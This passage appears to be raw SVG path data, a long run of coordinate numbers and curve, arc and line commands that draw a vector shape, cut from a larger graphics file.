.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,